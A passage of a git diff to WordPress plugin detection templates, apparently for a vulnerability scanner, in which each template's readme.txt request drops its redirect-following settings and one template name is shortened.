b/technologies/wordpress/plugins/ninja-forms.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" diff --git a/technologies/wordpress/plugins/ocean-extra.yaml b/technologies/wordpress/plugins/ocean-extra.yaml index 1f3a253890..ff58c6dd2c 100644 --- a/technologies/wordpress/plugins/ocean-extra.yaml +++ b/technologies/wordpress/plugins/ocean-extra.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" diff --git a/technologies/wordpress/plugins/official-facebook-pixel.yaml b/technologies/wordpress/plugins/official-facebook-pixel.yaml index 6e55aeb01c..f1e2fd882a 100644 --- a/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" diff --git a/technologies/wordpress/plugins/one-click-demo-import.yaml b/technologies/wordpress/plugins/one-click-demo-import.yaml index 076f7a48dc..75deada426 100644 --- a/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" diff --git a/technologies/wordpress/plugins/optinmonster.yaml b/technologies/wordpress/plugins/optinmonster.yaml index 8b536d1443..7efb2003cb 100644 --- a/technologies/wordpress/plugins/optinmonster.yaml +++ b/technologies/wordpress/plugins/optinmonster.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" diff --git a/technologies/wordpress/plugins/password-protected.yaml b/technologies/wordpress/plugins/password-protected.yaml index 6dbb3913d6..9fc4c9acd2 100644 --- a/technologies/wordpress/plugins/password-protected.yaml +++ b/technologies/wordpress/plugins/password-protected.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" diff --git a/technologies/wordpress/plugins/pdf-embedder.yaml b/technologies/wordpress/plugins/pdf-embedder.yaml index 4c12c57b33..d5dbedd395 100644 --- a/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/technologies/wordpress/plugins/pdf-embedder.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" diff --git a/technologies/wordpress/plugins/photo-gallery.yaml b/technologies/wordpress/plugins/photo-gallery.yaml index 1ffb84ef2d..e26497b644 100644 --- a/technologies/wordpress/plugins/photo-gallery.yaml +++ b/technologies/wordpress/plugins/photo-gallery.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" diff --git a/technologies/wordpress/plugins/php-compatibility-checker.yaml b/technologies/wordpress/plugins/php-compatibility-checker.yaml index e22c5b6958..41010947e9 100644 --- a/technologies/wordpress/plugins/php-compatibility-checker.yaml +++ b/technologies/wordpress/plugins/php-compatibility-checker.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" diff --git a/technologies/wordpress/plugins/pixelyoursite.yaml b/technologies/wordpress/plugins/pixelyoursite.yaml index dc7003bab8..eff1d4d78f 100644 --- a/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/technologies/wordpress/plugins/pixelyoursite.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" diff --git a/technologies/wordpress/plugins/polylang.yaml b/technologies/wordpress/plugins/polylang.yaml index 52841781f1..89b268330e 100644 --- a/technologies/wordpress/plugins/polylang.yaml +++ b/technologies/wordpress/plugins/polylang.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" diff --git a/technologies/wordpress/plugins/popup-builder.yaml b/technologies/wordpress/plugins/popup-builder.yaml index aeb73e0ee5..e526931d17 100644 --- a/technologies/wordpress/plugins/popup-builder.yaml +++ b/technologies/wordpress/plugins/popup-builder.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" diff --git a/technologies/wordpress/plugins/popup-maker.yaml b/technologies/wordpress/plugins/popup-maker.yaml index 903807744a..e203406b50 100644 --- a/technologies/wordpress/plugins/popup-maker.yaml +++ b/technologies/wordpress/plugins/popup-maker.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" diff --git a/technologies/wordpress/plugins/post-smtp.yaml b/technologies/wordpress/plugins/post-smtp.yaml index ce01abb6aa..4f26f00e2b 100644 --- a/technologies/wordpress/plugins/post-smtp.yaml +++ b/technologies/wordpress/plugins/post-smtp.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" diff --git a/technologies/wordpress/plugins/post-types-order.yaml b/technologies/wordpress/plugins/post-types-order.yaml index cfd44a4669..afe882f9bc 100644 --- a/technologies/wordpress/plugins/post-types-order.yaml +++ b/technologies/wordpress/plugins/post-types-order.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" diff --git a/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 7861f9fce4..b3c448cbcf 100644 --- a/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-premium-addons-for-elementor info: - name: Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection + name: Premium Addons for Elementor Detection author: ricardomaia severity: info reference: @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" diff --git a/technologies/wordpress/plugins/pretty-link.yaml b/technologies/wordpress/plugins/pretty-link.yaml index 79601fec89..f2cb20852c 100644 --- a/technologies/wordpress/plugins/pretty-link.yaml +++ b/technologies/wordpress/plugins/pretty-link.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" diff --git a/technologies/wordpress/plugins/really-simple-captcha.yaml b/technologies/wordpress/plugins/really-simple-captcha.yaml index 96d46b09ad..5fb9876eac 100644 --- a/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" diff --git a/technologies/wordpress/plugins/really-simple-ssl.yaml b/technologies/wordpress/plugins/really-simple-ssl.yaml index 085b2e4ec5..57d7cd0195 100644 --- a/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" diff --git a/technologies/wordpress/plugins/redirection.yaml b/technologies/wordpress/plugins/redirection.yaml index ebbc742eb8..6981af2fc2 100644 --- a/technologies/wordpress/plugins/redirection.yaml +++ b/technologies/wordpress/plugins/redirection.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" diff --git a/technologies/wordpress/plugins/redux-framework.yaml b/technologies/wordpress/plugins/redux-framework.yaml index 9ef1cbad9d..725816baa9 100644 --- a/technologies/wordpress/plugins/redux-framework.yaml +++ b/technologies/wordpress/plugins/redux-framework.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" diff --git a/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 5b010facea..7eaba4572f 100644 --- a/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" diff --git a/technologies/wordpress/plugins/safe-svg.yaml b/technologies/wordpress/plugins/safe-svg.yaml index 280e1a60d5..895557924b 100644 --- a/technologies/wordpress/plugins/safe-svg.yaml +++ b/technologies/wordpress/plugins/safe-svg.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" diff --git a/technologies/wordpress/plugins/seo-by-rank-math.yaml b/technologies/wordpress/plugins/seo-by-rank-math.yaml index bc5af38c1b..1f15d0c9eb 100644 --- a/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" diff --git a/technologies/wordpress/plugins/sg-cachepress.yaml b/technologies/wordpress/plugins/sg-cachepress.yaml index cf4c131eae..977899a4de 100644 --- a/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/technologies/wordpress/plugins/sg-cachepress.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" diff --git a/technologies/wordpress/plugins/sg-security.yaml b/technologies/wordpress/plugins/sg-security.yaml index 3693da2f6b..f0a14198a4 100644 --- a/technologies/wordpress/plugins/sg-security.yaml +++ b/technologies/wordpress/plugins/sg-security.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" diff --git a/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 81fdabe2d1..ddb3708e2d 100644 --- a/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" diff --git a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 83d1b22c9a..9a97dcbb3e 100644 --- a/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" diff --git a/technologies/wordpress/plugins/simple-custom-post-order.yaml b/technologies/wordpress/plugins/simple-custom-post-order.yaml index 9e8cb7dc95..7ca38509d0 100644 --- a/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" diff --git a/technologies/wordpress/plugins/simple-page-ordering.yaml b/technologies/wordpress/plugins/simple-page-ordering.yaml index dd8d548954..2e28737de3 100644 --- a/technologies/wordpress/plugins/simple-page-ordering.yaml +++ b/technologies/wordpress/plugins/simple-page-ordering.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" diff --git a/technologies/wordpress/plugins/siteguard.yaml b/technologies/wordpress/plugins/siteguard.yaml index fd8f662036..75477d0830 100644 --- a/technologies/wordpress/plugins/siteguard.yaml +++ b/technologies/wordpress/plugins/siteguard.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" diff --git a/technologies/wordpress/plugins/siteorigin-panels.yaml b/technologies/wordpress/plugins/siteorigin-panels.yaml index 689a02aaa2..a5ecbfc4d1 100644 --- a/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" diff --git a/technologies/wordpress/plugins/smart-slider-3.yaml b/technologies/wordpress/plugins/smart-slider-3.yaml index ea5c2cd7a4..fa95a04c84 100644 --- a/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/technologies/wordpress/plugins/smart-slider-3.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" diff --git a/technologies/wordpress/plugins/so-widgets-bundle.yaml b/technologies/wordpress/plugins/so-widgets-bundle.yaml index c919376d74..7188dec665 100644 --- a/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" diff --git a/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml b/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml index c54163a261..26a7b38a4c 100644 --- a/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml +++ b/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" diff --git a/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index e60c43d148..7564ed2dc5 100644 --- a/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" diff --git a/technologies/wordpress/plugins/sucuri-scanner.yaml b/technologies/wordpress/plugins/sucuri-scanner.yaml index 6227d9478a..b172b0ce21 100644 --- a/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" diff --git a/technologies/wordpress/plugins/svg-support.yaml b/technologies/wordpress/plugins/svg-support.yaml index a9dfa6a0cb..2a72c5ca37 100644 --- a/technologies/wordpress/plugins/svg-support.yaml +++ b/technologies/wordpress/plugins/svg-support.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" diff --git a/technologies/wordpress/plugins/table-of-contents-plus.yaml b/technologies/wordpress/plugins/table-of-contents-plus.yaml index b02ebb47c6..867641c7b6 100644 --- a/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" diff --git a/technologies/wordpress/plugins/tablepress.yaml b/technologies/wordpress/plugins/tablepress.yaml index c152065053..8e6d15ea5e 100644 --- a/technologies/wordpress/plugins/tablepress.yaml +++ b/technologies/wordpress/plugins/tablepress.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" diff --git a/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7839533f1f..1110f53a9c 100644 --- a/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" diff --git a/technologies/wordpress/plugins/the-events-calendar.yaml b/technologies/wordpress/plugins/the-events-calendar.yaml index ec19bd8508..b7c184d0f4 100644 --- a/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/technologies/wordpress/plugins/the-events-calendar.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" diff --git a/technologies/wordpress/plugins/themeisle-companion.yaml b/technologies/wordpress/plugins/themeisle-companion.yaml index b337cab2d3..564f68263f 100644 --- a/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/technologies/wordpress/plugins/themeisle-companion.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" diff --git a/technologies/wordpress/plugins/tinymce-advanced.yaml b/technologies/wordpress/plugins/tinymce-advanced.yaml index 5b0b72f627..cd25d9e629 100644 --- a/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" diff --git a/technologies/wordpress/plugins/translatepress-multilingual.yaml b/technologies/wordpress/plugins/translatepress-multilingual.yaml index b426e45b91..09309dffd0 100644 --- a/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" diff --git a/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index c69801fa65..bb1be2916f 100644 --- a/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" diff --git a/technologies/wordpress/plugins/under-construction-page.yaml b/technologies/wordpress/plugins/under-construction-page.yaml index 63531f0167..84ebc14962 100644 --- a/technologies/wordpress/plugins/under-construction-page.yaml +++ b/technologies/wordpress/plugins/under-construction-page.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" diff --git a/technologies/wordpress/plugins/unyson.yaml b/technologies/wordpress/plugins/unyson.yaml index e9304bcbb3..2a4bcde316 100644 --- a/technologies/wordpress/plugins/unyson.yaml +++ b/technologies/wordpress/plugins/unyson.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" diff --git a/technologies/wordpress/plugins/updraftplus.yaml b/technologies/wordpress/plugins/updraftplus.yaml index 5d410b8f04..5b93949ead 100644 --- a/technologies/wordpress/plugins/updraftplus.yaml +++ b/technologies/wordpress/plugins/updraftplus.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" diff --git a/technologies/wordpress/plugins/use-any-font.yaml b/technologies/wordpress/plugins/use-any-font.yaml index cf99ac8252..16ad89e0b4 100644 --- a/technologies/wordpress/plugins/use-any-font.yaml +++ b/technologies/wordpress/plugins/use-any-font.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" diff --git a/technologies/wordpress/plugins/user-role-editor.yaml b/technologies/wordpress/plugins/user-role-editor.yaml index b8818494b0..34f6976e36 100644 --- a/technologies/wordpress/plugins/user-role-editor.yaml +++ b/technologies/wordpress/plugins/user-role-editor.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" diff --git a/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index fe8f6e9c78..a249c9ad7b 100644 --- a/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" diff --git a/technologies/wordpress/plugins/w3-total-cache.yaml b/technologies/wordpress/plugins/w3-total-cache.yaml index 28aaf3601e..a1a52cb71a 100644 --- a/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/technologies/wordpress/plugins/w3-total-cache.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" diff --git a/technologies/wordpress/plugins/webp-converter-for-media.yaml b/technologies/wordpress/plugins/webp-converter-for-media.yaml index ccda923042..c5a73dc64d 100644 --- a/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" diff --git a/technologies/wordpress/plugins/widget-importer-exporter.yaml b/technologies/wordpress/plugins/widget-importer-exporter.yaml index 68cef2ecf9..6e3055697b 100644 --- a/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" diff --git a/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index edaed432e4..125d610a73 100644 --- a/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" diff --git a/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index fc9eee864e..9f52d5892a 100644 --- a/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" diff --git a/technologies/wordpress/plugins/woo-variation-swatches.yaml b/technologies/wordpress/plugins/woo-variation-swatches.yaml index f5e1e955bc..1dc566433e 100644 --- a/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index d6d8b8124c..26c2e6c1aa 100644 --- a/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index a41c8f0998..d0356790a6 100644 --- a/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-payments.yaml b/technologies/wordpress/plugins/woocommerce-payments.yaml index 4ef1e0eeb9..9b71a9caf5 100644 --- a/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 330e206ff9..a4836b3c98 100644 --- a/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index b1358aca99..675db76d32 100644 --- a/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce-services.yaml b/technologies/wordpress/plugins/woocommerce-services.yaml index 661c287524..93c09b72a3 100644 --- a/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/technologies/wordpress/plugins/woocommerce-services.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" diff --git a/technologies/wordpress/plugins/woocommerce.yaml b/technologies/wordpress/plugins/woocommerce.yaml index 74ca69c270..ca3d72bc46 100644 --- a/technologies/wordpress/plugins/woocommerce.yaml +++ b/technologies/wordpress/plugins/woocommerce.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" diff --git a/technologies/wordpress/plugins/woosidebars.yaml b/technologies/wordpress/plugins/woosidebars.yaml index 89827ae59c..70a6912ff6 100644 --- a/technologies/wordpress/plugins/woosidebars.yaml +++ b/technologies/wordpress/plugins/woosidebars.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" diff --git a/technologies/wordpress/plugins/wordfence.yaml b/technologies/wordpress/plugins/wordfence.yaml index 502ec9d41e..9efc2f62a3 100644 --- a/technologies/wordpress/plugins/wordfence.yaml +++ b/technologies/wordpress/plugins/wordfence.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" diff --git a/technologies/wordpress/plugins/wordpress-importer.yaml b/technologies/wordpress/plugins/wordpress-importer.yaml index d1b26d88a1..2c56b55e16 100644 --- a/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/technologies/wordpress/plugins/wordpress-importer.yaml @@ -13,8 +13,7 @@ info: requests: - method: GET - redirects: true - max-redirects: 2 + path: - "{{BaseURL}}/wp-content/plugins/wordpress-importer/readme.txt" diff --git a/technologies/wordpress/plugins/wordpress-seo.yaml b/technologies/wordpress/plugins/wordpress-seo.yaml index 8f36ef8ad3..6810e95c99 100644 --- a/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/technologies/wordpress/plugins/wordpress-seo.yaml @@ -13,8 +13,7 @@ info: 